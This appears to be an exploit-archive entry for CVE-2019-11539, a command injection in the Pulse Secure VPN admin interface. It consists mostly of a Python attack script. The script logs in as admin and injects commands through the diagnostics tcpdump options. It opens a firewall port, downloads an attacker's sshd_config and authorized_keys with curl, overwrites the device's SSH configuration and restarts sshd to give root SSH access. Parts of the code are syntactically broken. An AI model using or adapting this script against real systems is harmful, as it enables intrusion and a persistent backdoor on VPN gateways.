Pulse Secure VPN Arbitrary Command Execution

Pulse Secure Pulse Connect Secure versions 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure versions 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1 have an administrative web interface that allows an authenticated attacker to inject and execute commands.

MD5 | e4bda8e41eea432b388a7dd29b63007c

# Exploit Title: Pulse Secure VPN - Arbitrary Command Execution
# Date: 05/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Version: 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, 5.1RX before 5.1R15.1
# Description: In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.
# CVE : CVE-2019-11539



# Imports
import requests
import urllib
from bs4 import BeautifulSoup

# Host information
host = 'REPLACE-WITH-IP-OR-FQDN' # Host to exploit
login_url = '/dana-na/auth/url_admin/login.cgi' # Login page
CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump
CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code

# Login Credentials
user = 'admin' # Default Username
password = 'password' # Default Password

# Necessary for Curl
downloadHost = '' # IP or FQDN for host running webserver
port = '' # Port where web service is running. Needs to be a string, hence the quotes.

# Proxy Configuration
# Uncomment if you need to use a proxy or for debugging requests
proxies = {
# 'http': '',
# 'https': '',

# Headers for requests
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Accept-Encoding':'gzip, deflate',

# Cookies to send with request
cookies = {

# Data for post request
loginData = {
'tz_offset': 0,
'username': user,
'password': password,
'realm': 'Admin Users',
'btnSubmit': 'Sign In',

xsAuth = ''

s = requests.Session()
s.proxies = proxies

# Disable Warnings from requests library

# Administrator Login logic
# Probably wouldn't have figured this out without help from @buffaloverflow
def adminLogin():
global xsAuth
global _headers

# Send the intial request
r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)

print('[#] Logging in...') # Self Explanatory
r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request
print('[#] Sent Login Request...')

# Login Logic
if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""):
referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer
r = s.get(referer, verify=False) # Sends a get request
soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr
print('[#] Grabbing xsauth...')
xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
print('[!] Got xsauth: ' + xsAuth) # Self Explanatory
data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page
_headers = headers # Sets the headers
_headers.update({'referer':referer}) # Updates the headers
r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request

print('[+] Logged in!') # Self Explanatory

# Command injection logic
def cmdInject(command):
r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
if r.status_code == 200:
soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
payload = {
'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command,
# Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")}
# print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run
# Sends the get request to overwrite the template
r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
# Sends the get request to execute the code
r = s.get('https://' + host + CommandExecURL, verify=False)

# Main logic
if __name__ == '__main__':
print('[!] Starting Exploit')
print('[*] Opening Firewall port...')
cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port
print('[*] Downloading Necessary Files....')
cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config
cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys
print('[*] Backing up Files...')
cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config
cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys
print('[*] Overwriting Old Files...')
cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config
cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys
print('[*] Restarting SSHD...')
cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP
print('[!] Done Exploiting the system.')
print('[!] Please use the following command:')
print('[!] ssh -p6667 root@%s') %(host)
except Exception as e:

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